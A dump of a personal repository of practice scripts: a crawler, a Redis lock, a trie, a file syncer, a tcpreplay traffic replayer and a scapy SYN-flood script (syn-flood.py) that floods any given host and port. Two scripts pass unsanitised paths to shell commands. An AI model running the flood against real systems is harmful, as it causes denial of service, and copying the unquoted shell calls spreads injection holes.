├── README.md ├── create-flood.py ├── find_tail_lines.py ├── my_mutex.py ├── simplemultithreadsCrawler.py ├── syn-flood.py ├── trie.js └── watch_sync.py /README.md: -------------------------------------------------------------------------------- 1 | # my-python-practices 2 | simplemultithreadsCrawler.py: 3 | 4 | 一个简单的多线程生产者消费者爬虫,实际使用的时候可以重写parser的parse_links方法,来写自己的解析规则, 5 | 然后将解析后将继续要爬的地址放入url队列,生产者会自动爬 6 | 7 | 8 | sync-flood.py: 9 | 10 | 利用scapy构造包sync包,具有统计pps的功能,但是性能较差,而且scapy会响应服务器ack包 11 | 12 | watch_sync.py: 13 | 14 | 监听本地目录,当目录下的文件被更改、删除、新增时,远端目录下的文件会相应被更改、删除、新增 15 | 使用的pyinotify模块监听目录,paramkio上传文件到远端 16 | 当变成守护进程时,将标准输出重定向到文件不起作用,不知道定向到哪去了,求大神帮忙看看 17 | 18 | my_mutex.py: 19 | 20 | 使用redis实现一个锁,可用作多进程或者分布式锁 21 | 22 | find_tail_lines.py: 23 | 24 | 实现读取打印文件末尾倒数N行开始M行内容 25 | 26 | 27 | 28 | 29 | trie.js: 30 | >js实现的一个前缀树,性能强悍,不知道这归功于前缀树还是js哈哈。可以用来统计词频、单词查询、前缀匹配。 31 | -------------------------------------------------------------------------------- /create-flood.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import os 3 | import sys 4 | import fcntl 5 | import math 6 | import json 7 | from optparse import OptionParser 8 | from scapy.all import * 9 | 10 | 11 | ''' 12 | 预先生成要打流的包,然后利用包回放工具来打流,通过参数 pps来控制速率 13 | s来制定打流时间,f制定包文件,i用于制定网卡,如果不指定,则脚本自己分配 14 | 先分配没有使用的网卡,一个网卡最多可以两个人同时使用(多少人可以自己改一下),如果超过则不允许使用 15 | ''' 16 | def get_argument(): 17 | usage = "usage: %prog [options] arg1 arg2,using -h or --help for help" 18 | parser = OptionParser(usage=usage) 19 | parser.add_option("-p","--pps",dest="pps",help="pps of sending packets,default=1000",type="int",default=1000) 20 | parser.add_option("-s","--seconds",dest="seconds",\ 21 | help="seconds packet transmission last,default is 60 seconds",type="int",default=60) 22 | parser.add_option("-f","--file",dest="filename",help="the pcap file to send packets") 23 | parser.add_option("-i","--interface",dest="interface",\ 24 | help="specifing the interface,if not spcified,it will be automactic specified") 25 | (options, args) = parser.parse_args() 26 | arguments = options.__dict__ 27 | if arguments['filename'] == None: 28 | parser.print_help() 29 | sys.exit(1) 30 | return arguments 31 | 32 | 33 | def tran_time_to_loop(pps,seconds,filename): 34 | try: 35 | cap = open(filename,"rb") 36 | except: 37 | print "cannot open cap file" 38 | sys.exit(1) 39 | capfile = sniff(offline=filename) 40 | packet_nums = len(capfile)#获取包文件数量 41 | print "%s pps" % pps 42 | print "%s packets in capfile" % packet_nums 43 | loop = int(math.ceil(pps*seconds/packet_nums))#通过包文件数量、时间和pps确定回放多少次 44 | print "%s loops" % loop 45 | return loop 46 | 47 | class flood_manage: 48 | 49 | # def __new__(cls, *args, **kw): 50 | # if not hasattr(cls, '_instance'): 51 | # orig = super(flood_manage, cls) 52 | # cls._instance = orig.__new__(cls, *args, **kw) 53 | # return cls._instance 54 | 55 | def __init__(self,inter_file="/tmp/inter_file"): 56 | self.__all_inter = set() 57 | self.__inter_file = inter_file 58 | self.__get_inter_name() 59 | if not os.path.exists(self.__inter_file): 60 | open(self.__inter_file,"w").close() 61 | self.__used_inter = self.__read_file() 62 | 63 | def __write_file(self,object): 64 | ''' 65 | 读文件时加共享锁,写文件时加排它锁 66 | ''' 67 | inter_file = open(self.__inter_file,"w") 68 | fcntl.flock(inter_file,fcntl.LOCK_EX) 69 | json.dump(object,inter_file) 70 | fcntl.flock(inter_file,fcntl.LOCK_UN) 71 | inter_file.close() 72 | 73 | def __read_file(self): 74 | inter_file = open(self.__inter_file,"r") 75 | fcntl.flock(inter_file,fcntl.LOCK_SH) 76 | try: 77 | data = json.load(inter_file) 78 | except ValueError: 79 | data = {} 80 | fcntl.flock(inter_file,fcntl.LOCK_UN) 81 | inter_file.close() 82 | return data 83 | 84 | def __get_inter_name(self): 85 | ''' 86 | 获取所有非环路接口,并存如__all_inter中 87 | ''' 88 | proc_net_dev = "/proc/net/dev" 89 | with open(proc_net_dev,"r") as f: 90 | f.next() 91 | f.next() 92 | for line in f: 93 | eth_name = line.split(":")[0].strip() 94 | if eth_name and eth_name != "lo": 95 | self.__all_inter.add(eth_name) 96 | 97 | def find_aval_inter(self): 98 | ''' 99 | 为用户分配一个可用的接口,优先寻找没有使用的接口 100 | ''' 101 | for i in self.__all_inter: 102 | if self.__used_inter.get(i) in (0,None): 103 | self.__used_inter[i] = 1 104 | self.__write_file(self.__used_inter) 105 | return i 106 | for i in self.__all_inter: 107 | if self.__used_inter.get(i) == 1: 108 | self.__used_inter[i] = 2 109 | self.__write_file(self.__used_inter) 110 | return i 111 | print "no available interface,please wait" 112 | sys.exit(1) 113 | 114 | 115 | def create_flood(self,pps,loop,filename,interface): 116 | ''' 117 | 打流,打完流或者出现异常(比如用户ctr+c)更新网卡使用情况:__used_inter 118 | 因为system函数通过fork来执行代码,所以多个用户使用时不会冲突 119 | ''' 120 | execStr = "tcpreplay --pps=%s --loop=%s --intf1=%s %s" % (pps,loop,interface,filename) 121 | try: 122 | os.system(execStr) 123 | except: 124 | pass 125 | finally: 126 | self.__used_inter = self.__read_file()#先更新used_inter,因为可能有其他用户使用,再在更新完的基础上将对应的接口数量减一 127 | self.__used_inter[interface] -= 1 128 | self.__write_file(self.__used_inter) 129 | 130 | 131 | if __name__ == "__main__": 132 | arguments = get_argument() 133 | manage = flood_manage() 134 | interface = arguments.get("interface") or manage.find_aval_inter() 135 | loop = tran_time_to_loop(arguments['pps'],arguments['seconds'],arguments['filename']) 136 | manage.create_flood(arguments['pps'],loop,arguments['filename'],interface) 137 | 138 | 139 | -------------------------------------------------------------------------------- /find_tail_lines.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | def find_tail_lines(fname, rev_n, line_num): 3 | ''' 4 | 函数功能:从文件倒数第rev_n开始打印line_num行内容 5 | :param fname: 文件地址 6 | :param rev_n: 从倒数第rev_n开始读取 7 | :param line_num: 读取多少行 8 | :return: 读取的内容 9 | ''' 10 | with open(fname, 'rb') as f: 11 | buf_len = min(1024 * line_num, 4096) 12 | f.seek(0, 2) 13 | cur_pos = f.tell() #找到末尾位置 14 | new_line_count = 0 15 | while cur_pos > 0: #获取往回走的长度 16 | prev_pos = cur_pos 17 | cur_pos -= buf_len 18 | if cur_pos < 0: 19 | cur_pos = 0 20 | block_size = prev_pos 21 | else: 22 | block_size = buf_len 23 | f.seek(cur_pos) 24 | content = f.read(block_size) 25 | new_line_count += content.count('\n') #找当前块有多少个换行符 26 | extra_count = new_line_count - rev_n #内容块多了多少行 27 | if extra_count >= 0: 28 | start_pos = 0 29 | for i in range(0, extra_count): #找到倒数第rev_n行位置 30 | start_pos = content.find('\n', start_pos) + 1 31 | f.seek(cur_pos + start_pos) 32 | # print "---",f.read(), "---" 33 | for _ in range(0, line_num): #读取line_num行 34 | print "--", f.readline() 35 | break 36 | 37 | def test(): 38 | fname = "a.txt" 39 | find_tail_lines(fname, 5, 5) 40 | 41 | if __name__ == "__main__": 42 | test() 43 | -------------------------------------------------------------------------------- /my_mutex.py: -------------------------------------------------------------------------------- 1 | import time 2 | import redis 3 | import threading 4 | import multiprocessing 5 | import time 6 | import random 7 | import sys 8 | 9 | 10 | class Key(unicode): 11 | def __getitem__(self, key): 12 | return Key(u"%s:%s" % (self, key)) 13 | 14 | 15 | class Mutex(object): 16 | def __init__(self, id, timeout, ident, re=redis.StrictRedis(host='127.0.0.1', port=13379, db=4)): 17 | self._key = Key(id) 18 | self._re = re 19 | self._timeout = timeout 20 | self._ident = ident 21 | 22 | def __enter__(self): 23 | self.lock() 24 | return self 25 | 26 | def __exit__(self, exc_type, exc_value, traceback): 27 | self.unlock() 28 | 29 | def lock(self): 30 | _lock_key = self._key['_lock:'] 31 | 32 | re = self._re 33 | while True: 34 | result = re.set(_lock_key, self._ident, nx=True, ex=self._timeout) 35 | if not result: 36 | time.sleep(0.01) 37 | else: 38 | return 39 | 40 | 41 | def unlock(self): 42 | _lock_key = self._key['_lock:'] 43 | pipeline = self._re.pipeline 44 | with pipeline() as p: 45 | try: 46 | p.watch(_lock_key) 47 | lock_ident = p.get(_lock_key) 48 | p.multi() 49 | if lock_ident != self._ident: 50 | return 51 | p.delete(_lock_key) 52 | p.execute() 53 | except: 54 | sys.stderr.write("not deleted\n") 55 | 56 | 57 | def test_mutex(name, thread_num): 58 | for i in xrange(20): 59 | mutex = Mutex(name, timeout=5, ident=str(thread_num)) 60 | mutex.lock() 61 | sys.stderr.write(thread_num + "locked\n") 62 | time.sleep(0.01) 63 | mutex.unlock() 64 | sys.stderr.write(thread_num + "---unlocked\n\n") 65 | 66 | 67 | 68 | if __name__ == "__main__": 69 | threads = [] 70 | for i in range(5): 71 | thread = multiprocessing.Process(target=test_mutex, args=('lock', str(i))) 72 | thread.daemon = True 73 | threads.append(thread) 74 | 75 | for thread in threads: 76 | thread.start() 77 | for thread in threads: 78 | thread.join() -------------------------------------------------------------------------------- /simplemultithreadsCrawler.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import threading 3 | import Queue 4 | import urlparse 5 | import logging 6 | import requests 7 | import time 8 | import signal 9 | import re 10 | # from collection import nametuple 11 | 12 | LOGGER = logging.getLogger(__name__) 13 | 14 | def is_redirect(response): 15 | return response.status_code in (300, 301, 302, 303, 307) 16 | 17 | class Crawler(threading.Thread): 18 | 19 | def __init__(self,url_queue,response_queue, 20 | max_redirects=10, 21 | max_tries=3,proxy=None, 22 | delay_access_time=1): 23 | 24 | threading.Thread.__init__(self) 25 | self.max_redirects = max_redirects 26 | self.max_tries = max_tries 27 | self.delay_access_time = delay_access_time 28 | self.url_queue = url_queue 29 | self.response_queue = response_queue 30 | self.seen_urls = set() 31 | self.proxy = proxy 32 | self.session = requests.Session() 33 | self.session.headers.update({"User-Agent":\ 34 | "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"}) 35 | 36 | def add_url(self, url, max_redirects=None): 37 | max_redirects = max_redirects != None and max_redirects or self.max_redirects 38 | self.url_queue.put((url,max_redirects)) 39 | 40 | 41 | def run(self, max_redirects=None): 42 | max_redirects = max_redirects != None and max_redirects or self.max_redirects 43 | while True: 44 | url = self.url_queue.get(True) 45 | if url == None: 46 | break 47 | tries = 0 48 | while tries < self.max_tries: 49 | try: 50 | if self.proxy: 51 | response = self.session.get(url,proxies=self.proxy) 52 | else: 53 | response = self.session.get(url,proxies=self.proxy) 54 | if tries > 1: 55 | LOGGER.info("try %s for %s success",tries,url) 56 | break 57 | except Exception as e: 58 | LOGGER.error("try %s for %s raised %r",tries, url, e) 59 | tries += 1 60 | time.sleep(self.delay_access_time) 61 | 62 | else: 63 | LOGGER.error('%r failed after %r tries',url, self.max_tries) 64 | 65 | if is_redirect(response): 66 | location = response.headers['location'] 67 | location_url = urlparse.urljoin(url,location) 68 | if max_redirects > 0: 69 | self.add_url(location_url, max_redirects-1) 70 | 71 | else: 72 | print "response_url:",response.url 73 | response_queue.put(response) 74 | self.url_queue.task_done() 75 | time.sleep(self.delay_access_time) 76 | else: 77 | self.session.close() 78 | 79 | class Parser(threading.Thread): 80 | def __init__(self,url_queue,response_queue): 81 | self.response_queue = response_queue 82 | self.url_queue = url_queue 83 | threading.Thread.__init__(self) 84 | # self.save_queue = save_queue 85 | 86 | def run(self): 87 | while True: 88 | 89 | response = self.response_queue.get(True) 90 | print response.url,type(response) 91 | self.response_queue.task_done() 92 | parse_result = self.parse_links(response) 93 | if parse_result == False: 94 | self.url_queue.put(None) 95 | break 96 | 97 | def parse_links(self, response): 98 | result = re.search(r'''(?i)href=["']([^\s]+)[\s"'\s]>下一页''', response._content) 99 | # print result.group(1) 100 | if result: 101 | url = urlparse.urljoin(response.url,result.group(1)) 102 | self.url_queue.put(url) 103 | return True 104 | else: 105 | return False 106 | 107 | 108 | if __name__ == "__main__": 109 | url_queue = Queue.Queue() 110 | url_queue.put("http://blog.csdn.net/ECHOutopia/article/list/1") 111 | response_queue = Queue.Queue() 112 | crawler = Crawler(url_queue,response_queue) 113 | parser = Parser(url_queue,response_queue) 114 | crawler.start() 115 | parser.start() 116 | crawler.join() 117 | parser.join() -------------------------------------------------------------------------------- /syn-flood.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import threading 3 | from scapy.all import * 4 | import random 5 | import signal 6 | import time 7 | 8 | thread_limit = 200 9 | total = 0 10 | 11 | class SynFlood(threading.Thread): 12 | def __init__(self, target, port): 13 | threading.Thread.__init__(self) 14 | self.target = target 15 | self.port = port 16 | 17 | def build_syn_packet(self): 18 | ip = IP() 19 | # ip.src = "%d.%d.%d.%d" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254)) 20 | ip.src="192.168.65.128" 21 | ip.dst =self.target 22 | 23 | tcp = TCP() 24 | tcp.sport = random.randint(1,65535) 25 | tcp.dport = self.port 26 | tcp.flags = 'S' 27 | return ip/tcp 28 | 29 | def run(self): 30 | global total 31 | syn_packet = self.build_syn_packet() 32 | s = conf.L3socket(iface='eth0') 33 | while True: 34 | s.send(syn_packet) 35 | total += 1 36 | 37 | 38 | def handler(signum, frame): 39 | print "exit" 40 | # with open("a.txt","w") as f: 41 | # f.write(total) 42 | print "time:",time.time()-start_time 43 | print "packet num:",total 44 | print "pps:",total/(time.time()-start_time) 45 | sys.exit() 46 | 47 | if __name__ == "__main__": 48 | if len(sys.argv) != 4: 49 | print "example:%s 127.0.0.1 8080 20" % sys.argv[0] 50 | 51 | target = sys.argv[1] 52 | port = int(sys.argv[2]) 53 | concurrent = int(sys.argv[3]) 54 | signal.signal(signal.SIGINT, handler) 55 | signal.signal(signal.SIGTERM, handler) 56 | threads = [] 57 | start_time = time.time() 58 | for _ in range(0,concurrent): 59 | t = SynFlood(target,port) 60 | t.setDaemon(True) 61 | threads.append(t) 62 | t.start() 63 | # for _ in range(0,concurrent): 64 | # t.join() 65 | while True: 66 | time.sleep(1) 67 | -------------------------------------------------------------------------------- /trie.js: -------------------------------------------------------------------------------- 1 | function TrieNode(){ 2 | this.count = 0; 3 | this.next = {}; 4 | this.exist = false; 5 | 6 | this.insert = function(word){ 7 | let node = this; 8 | for (let i of word){ 9 | // console.log(i, node.next) 10 | if (! (i in node.next)){ 11 | node.next[i] = new TrieNode() 12 | } 13 | node = node.next[i]; 14 | node.count ++; 15 | 16 | } 17 | node.exist = true; 18 | }; 19 | 20 | this.search = function(word, prefix){ 21 | let node = this; 22 | for (let i of word){ 23 | node = node.next[i]; 24 | if (!node){ 25 | return false; 26 | } 27 | } 28 | if(node.exist || prefix){ 29 | return node; 30 | }else{ 31 | return false; 32 | } 33 | }; 34 | 35 | this.get_through = function(root, out, is_root){ 36 | let node = this; 37 | for (let i in node.next){ 38 | let next_node = node.next[i]; 39 | if (is_root){ 40 | next_node.word = i; 41 | next_node.get_through(root, out) 42 | }else{ 43 | next_node.word = node.word.concat(i); 44 | if (next_node.exist){ 45 | out[next_node.word] = next_node.count; 46 | } 47 | next_node.get_through(root, out) 48 | } 49 | } 50 | node.word = ''; 51 | }; 52 | 53 | this.with_prefix = function(prefix, include_prefix){ 54 | let node = this.search(prefix, true); 55 | if (node === false){ 56 | return node; 57 | }else{ 58 | node.word = prefix; 59 | let out = {}; 60 | if (include_prefix){ 61 | out[prefix] = node.count; 62 | } 63 | node.get_through(node, out, false); 64 | return out 65 | } 66 | } 67 | } 68 | 69 | // var strings = ['But', 'it', 'also', 'shows', 'that', 'bilinguals', 'are', 'more', 'flexible', 'thinkers', 'append', 'already', 'it', 'iron', 'item']; 70 | 71 | // var root = new TrieNode(); 72 | 73 | // for (let i of strings){ 74 | // root.insert(i) 75 | // } 76 | // console.log('search "thinker": ', root.search('thinker')); 77 | // console.log('search "thinkers": ', root.search('thinkers')); 78 | // console.log(root.with_prefix('it', true)); 79 | // console.log(root.with_prefix('it', false)); 80 | // var out = {}; 81 | // root.get_through(root, out, true); 82 | // console.log(out); 83 | // console.log('a'); 84 | 85 | module.exports = TrieNode 86 | -------------------------------------------------------------------------------- /watch_sync.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import pyinotify 4 | import paramiko 5 | 6 | server = "127.0.0.1" 7 | port = 22 8 | username = "echo" 9 | password = "" 10 | 11 | class SSHConnection(): 12 | 13 | def __new__(cls,*args,**kw): 14 | if not attr(cls,'_instance'): 15 | orig = super(SSHConnection,cls) 16 | cls._instance = orig.__new__(cls,*args,**kw) 17 | return cls._instance 18 | 19 | def __init__(self,server,port,username,password): 20 | self.server = server 21 | self.port = port 22 | self.username = username 23 | self.password = password 24 | self._ssh = None 25 | 26 | def connection(self): 27 | if not self.is_connected(): 28 | self._ssh = paramiko.SSHClient() 29 | self._ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 30 | self._ssh.connect(self.server, self.port, 31 | username = self.username, password = self.password) 32 | 33 | return self._ssh 34 | 35 | def is_connected(self): 36 | transport = self._ssh.get_transport() if self._ssh else None 37 | return transport and transport.is_active() 38 | 39 | def exec_command(self,command): 40 | self.connection().exec_command(command) 41 | 42 | def get_sftp(self): 43 | self.connection() 44 | return self._ssh.open_sftp() 45 | 46 | 47 | 48 | 49 | class EventHandler(pyinotify.ProcessEvent): 50 | 51 | def __init__(self,local_dir,remote_dir): 52 | self._ssh = SSHConnection(server,port,username,password) 53 | self._ssh.connection() 54 | self._sftp = self._ssh.get_sftp() 55 | self.local_dir = local_dir 56 | self.remote_dir = remote_dir 57 | 58 | # def process_IN_CREATE(self,event): 59 | # print "created",event.pathname 60 | def get_remote_path(self,local_path): 61 | 62 | local_sub_path = self.local_dir.endswith("/") and local_path[len(self.local_dir):] or local_path[len(self.local_dir)+1:] 63 | # print "local_sub_path",local_sub_path 64 | 65 | remote_path = self.remote_dir.endswith("/") and self.remote_dir+local_sub_path or self.remote_dir+"/"+local_sub_path 66 | # print "remote_path",remote_path 67 | 68 | return remote_path 69 | 70 | 71 | def process_IN_DELETE(self,event): 72 | print "deleted",event.pathname 73 | self.del_remote_file(self.get_remote_path(event.pathname)) 74 | 75 | # def process_IN_MODIFY(self,event): 76 | # print "modified",event.pathname 77 | 78 | def process_IN_CLOSE_WRITE(self,event): 79 | # print "close_write",event.pathname,self.get_remote_path(event.pathname) 80 | self.upload_to_remote(event.pathname,self.get_remote_path(event.pathname)) 81 | 82 | def process_IN_MOVED_FROM(self,event): 83 | print "moved from",event.pathname 84 | self.del_remote_file(self.get_remote_path(event.pathname)) 85 | 86 | def process_IN_MOVED_TO(self,event): 87 | print "moved to",event.pathname 88 | self.upload_to_remote(event.pathname,self.get_remote_path(event.pathname)) 89 | 90 | def del_remote_file(self,file_path): 91 | self._ssh.exec_command("rm %s" % file_path) 92 | 93 | def upload_to_remote(self,local_file,remote_file): 94 | try: 95 | self._sftp.put(local_file,remote_file) 96 | except Exception ,e: 97 | print e 98 | 99 | 100 | def make_deamon(stdin="/dev/null",stdout="/dev/null",stderr="/dev/null"): 101 | try: 102 | pid = os.fork() 103 | if pid > 0: 104 | sys.exit(0) 105 | except OSError, e: 106 | sys.stderr.write("fork failed: (%d) %s\n" %(e.errno,e.strerror)) 107 | sys.exit(1) 108 | 109 | os.setsid() 110 | 111 | try: 112 | pid = os.fork() 113 | if pid >0: 114 | sys.exit(0) 115 | except OSError,e: 116 | sys.stderr.write("fork failed: (%d) %s\n" %(e.errno,e.strerror)) 117 | sys.exit(1) 118 | 119 | os.chdir("/") 120 | os.umask(0) 121 | 122 | for f in sys.stdout, sys.stderr: f.flush() 123 | si = open(stdin,"r") 124 | so = open(stdout,"a+",0) 125 | se = open(stderr,"a+",0) 126 | os.dup2(si.fileno(), sys.stdin.fileno()) 127 | os.dup2(so.fileno(), sys.stdout.fileno()) 128 | os.dup2(se.fileno(), sys.stderr.fileno()) 129 | 130 | def main(): 131 | if len(sys.argv) != 3: 132 | print "Usage: python watch_sync.py watched_local_dir remote_dir" 133 | sys.exit(1) 134 | 135 | wm = pyinotify.WatchManager() 136 | mask = pyinotify.IN_CREATE | pyinotify.IN_DELETE | \ 137 | pyinotify.IN_MODIFY | pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO 138 | 139 | handler = EventHandler(sys.argv[1],sys.argv[2]) 140 | notifier = pyinotify.Notifier(wm, handler) 141 | 142 | excl_lst = ['^\..*'] 143 | excl = pyinotify.ExcludeFilter(excl_lst) 144 | wdd = wm.add_watch(sys.argv[1], mask, rec=True,exclude_filter=excl) 145 | 146 | try: 147 | notifier.loop() 148 | except pyinotify.NotifierError, err: 149 | print >> sys.stderr, err 150 | 151 | if __name__ == "__main__": 152 | //make_deamon(stdout="/tmp/watch_file.log") 153 | main() 154 | --------------------------------------------------------------------------------